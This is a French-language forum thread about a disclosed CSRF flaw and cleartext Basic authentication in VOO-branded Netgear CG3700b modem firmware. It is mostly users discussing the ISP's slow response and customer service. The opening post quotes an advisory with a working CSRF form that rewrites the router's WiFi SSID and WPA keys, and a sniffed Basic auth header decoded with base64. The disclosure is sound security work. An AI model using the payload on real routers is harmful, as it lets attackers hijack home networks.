Multiples vulnérabilités dans Netgear CG3700b Firmware VOO

Discussions sur le provider VOO

Modérateurs : Shak, Barbapapa

Multiples vulnérabilités dans Netgear CG3700b Firmware VOO

Message par FredHilbert » 27 Avr 2016 14:23

Bonjour à tous,
L'auteur du CVE à besoin de capture d'écran. Si quelqu'un est dévoué...

Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.

Example:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index";
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>


Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.

Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD

SOURCE: http://seclists.org/fulldisclosure/2016/Apr/87
Dernière édition par FredHilbert le 29 Avr 2016 18:39, édité 1 fois.
ImageImage
Avatar de l’utilisateur
FredHilbert
Membre
Membre
 
Message(s) : 21
Inscription : 27 Oct 2015 17:29
Localisation : Athus - Luxembourg

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par FredHilbert » 28 Avr 2016 19:12

La réaction très pro et priceless de la CM chez VOO:

Image
ImageImage
Avatar de l’utilisateur
FredHilbert
Membre
Membre
 
Message(s) : 21
Inscription : 27 Oct 2015 17:29
Localisation : Athus - Luxembourg

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par max » 28 Avr 2016 19:22

Magnifique réaction des CM de Voo :)
Avatar de l’utilisateur
max
Barbapapa Team
Barbapapa Team
 
Message(s) : 8846
Inscription : 10 Juin 2001 01:58
Localisation : fr_BE.UTF8@euro

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par solar10 » 28 Avr 2016 21:00

Mouahahaha....
Gaffe quand même parce que je me souviens de deux couillons qui se sont retrouvés en GàV après avoir posté une faille de sécurité sur un blog public.
Avatar de l’utilisateur
solar10
Vingt mille
Vingt mille
 
Message(s) : 24396
Inscription : 04 Mai 2008 14:39
Localisation : www.belgium.be:4000

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par roylion15 » 29 Avr 2016 14:34

Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...
VOO « PACK TRIO GIGA MAX MOBILE»
TECHNICOLOR CGA4233 (Mode Bridge) - Routeur ASUS GT-AXE16000
Avatar de l’utilisateur
roylion15
Acharné
Acharné
 
Message(s) : 3993
Inscription : 06 Juil 2011 12:37
Localisation : Bassenge

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par clear.be » 29 Avr 2016 14:42

FredHilbert a écrit :La réaction très pro et priceless de la CM chez VOO:

Image



C'est une blague ??? :lol: :lol: :lol: :lol:

Image
Avatar de l’utilisateur
clear.be
Dix mille
Dix mille
 
Message(s) : 12480
Inscription : 10 Sep 2003 20:40

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par mackguil » 29 Avr 2016 15:21

clear.be a écrit :
Image


Je l'ai cherché mais n'ai pas remis la main dessus.
Avatar de l’utilisateur
mackguil
Vingt mille
Vingt mille
 
Message(s) : 21325
Inscription : 14 Mai 2005 11:22
Localisation : Luik Belgium

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par clear.be » 29 Avr 2016 15:33

:?:
Avatar de l’utilisateur
clear.be
Dix mille
Dix mille
 
Message(s) : 12480
Inscription : 10 Sep 2003 20:40

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par FredHilbert » 29 Avr 2016 16:07

roylion15 a écrit :Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...


Dans ce cas précis je pense que le problème vient plutôt du firmware de VOO (et de la non-réactivité de son équipe de sécurité). J'ai pu parler avec l'auteur de la découverte. Il a prévenu VOO début janvier. Il a pas eu de réponse. Début mars nouvelle tentative avec PoC cette fois-ci. Réponse... 30 jours après. C'est d'ailleurs pour ça qu'il a fait une CVE.

De manière général je suis plutôt satisfait de VOO. Mais dans ce cas précis il faut dire qu'il traînent.

Netgear, pour le boulot je n'achète que ça pour les AP. Mais dans ce cas précis je pense que le 3700b n'y est pour (presque) rien.
ImageImage
Avatar de l’utilisateur
FredHilbert
Membre
Membre
 
Message(s) : 21
Inscription : 27 Oct 2015 17:29
Localisation : Athus - Luxembourg

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par jojo » 29 Avr 2016 16:21

roylion15 a écrit :Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...



C'est vrai que si "ça existe dans plein de routeurs du commerce", pourquoi s'en soucier ? :roll:
jojo
Habitué
Habitué
 
Message(s) : 793
Inscription : 16 Nov 2005 16:37
Localisation : Près du radiateur

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par mackguil » 29 Avr 2016 16:48

clear.be a écrit : :?:


Je voulais cette vidéo et la poster comme toi.
Avatar de l’utilisateur
mackguil
Vingt mille
Vingt mille
 
Message(s) : 21325
Inscription : 14 Mai 2005 11:22
Localisation : Luik Belgium

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par mackguil » 29 Avr 2016 16:50

jojo a écrit :
roylion15 a écrit :Hum,
il y a certes des vulnérabilités en mode routeur qui n'existent plus forcément en mode bridge et ce genre de trucs çà existe dans plein de routeurs du commerce et pas seulement chez NETGEAR...



C'est vrai que si "ça existe dans plein de routeurs du commerce", pourquoi s'en soucier ? :roll:


+1
Avatar de l’utilisateur
mackguil
Vingt mille
Vingt mille
 
Message(s) : 21325
Inscription : 14 Mai 2005 11:22
Localisation : Luik Belgium

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par FredHilbert » 29 Avr 2016 17:29

mackguil a écrit :
clear.be a écrit : :?:


Je voulais cette vidéo et la poster comme toi.


Mackgui tu as oublié le fameux "est-ce que tu baise"?

ça aide pour la recherche
ImageImage
Avatar de l’utilisateur
FredHilbert
Membre
Membre
 
Message(s) : 21
Inscription : 27 Oct 2015 17:29
Localisation : Athus - Luxembourg

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par tamika » 29 Avr 2016 17:53

Ce qui est genant dans l'histoire ce n'est pas (trop) qu'il y ait un probleme mais qu'ils n'ont pas l'air de comprendre de quoi on parle.
Comme la fois ou je les ai appeles pour leur demander s'il n'y avait pas un probleme de route (j'avais fait un traceroute jusqu'a un serveur de jeu) et qu'ils m'ont repondu que VOO ne s'occupait pas des routes et que je devrais voir avec l'administration communale.
Veridique.
Edward Snowden: "Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say."
Avatar de l’utilisateur
tamika
Habitué
Habitué
 
Message(s) : 785
Inscription : 03 Avr 2010 11:19
Localisation : Bouillon (prov. Luxembourg)

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par solar10 » 29 Avr 2016 17:56

Ah quoi tu veux t'attendre quand tu tombes sur des ploucs intérimaires tout juste capable de suivre un script de questions. Tout ce qui sort de leur FAQ, c'est ... ingérable.
Dernière édition par solar10 le 29 Avr 2016 18:08, édité 1 fois.
Avatar de l’utilisateur
solar10
Vingt mille
Vingt mille
 
Message(s) : 24396
Inscription : 04 Mai 2008 14:39
Localisation : www.belgium.be:4000

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par roylion15 » 29 Avr 2016 18:00

Oui mais bon à une époque je suis d'accord qu'on pouvait tomber sur des personnes totalement ignares ... J'en ai fait l'expérience plusieurs fois mais bon maintenant cela s'est bien amélioré et le forum Voo est relativement efficace pour régler des soucis qu'ils soient administratifs ou techniques ...pour ce qui est du HD par téléphone je ne l'utilise plus jamais.
VOO « PACK TRIO GIGA MAX MOBILE»
TECHNICOLOR CGA4233 (Mode Bridge) - Routeur ASUS GT-AXE16000
Avatar de l’utilisateur
roylion15
Acharné
Acharné
 
Message(s) : 3993
Inscription : 06 Juil 2011 12:37
Localisation : Bassenge

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par FredHilbert » 29 Avr 2016 18:04

tamika a écrit :ils m'ont repondu que VOO ne s'occupait pas des routes et que je devrais voir avec l'administration communale. Veridique.


AHAHAH You made my day !

Oui mais je vous trouve méchant là. OK au helpdesk 1er niveau ils lisent un script, genre "vous avez redémarré votre box monsieur"? Mais je suppose qu'il existe un second niveau compétant.
ImageImage
Avatar de l’utilisateur
FredHilbert
Membre
Membre
 
Message(s) : 21
Inscription : 27 Oct 2015 17:29
Localisation : Athus - Luxembourg

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par roylion15 » 29 Avr 2016 18:24

Le niveau 2 ca n'a rien à voir effectivement et je ne parlerai pas du service pro qui est lui des plus compétent car je le côtoie pour le boulot ...
VOO « PACK TRIO GIGA MAX MOBILE»
TECHNICOLOR CGA4233 (Mode Bridge) - Routeur ASUS GT-AXE16000
Avatar de l’utilisateur
roylion15
Acharné
Acharné
 
Message(s) : 3993
Inscription : 06 Juil 2011 12:37
Localisation : Bassenge

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par FredHilbert » 29 Avr 2016 19:00

roylion15 je vois dans ta signature que tu as le TECHNICOLOR TC7210 de VOO. Tu es content avec ?

J'envisage de changer mon Netgear CG3700b par celui là. J'ai demandé a VOO si ils avait laissé el firmware d'origine voici ce qu'il a répondu:
Image

Est-ce que tu peux confirmer, tu as eu l'occasion de le "bricoler" un peu?
Dernière édition par FredHilbert le 29 Avr 2016 20:07, édité 1 fois.
ImageImage
Avatar de l’utilisateur
FredHilbert
Membre
Membre
 
Message(s) : 21
Inscription : 27 Oct 2015 17:29
Localisation : Athus - Luxembourg

Re: Multiples vulnérabilités dans Netgear CG3700b Firmware V

Message par cdl » 29 Avr 2016 19:03

Priceless !! :like:
cdl
Acharné
Acharné
 
Message(s) : 2331
Inscription : 21 Nov 2009 13:27
Localisation : 1370

Suivant

Retour vers Voo

Qui est en ligne ?

Utilisateur(s) parcourant ce forum : Aucun utilisateur inscrit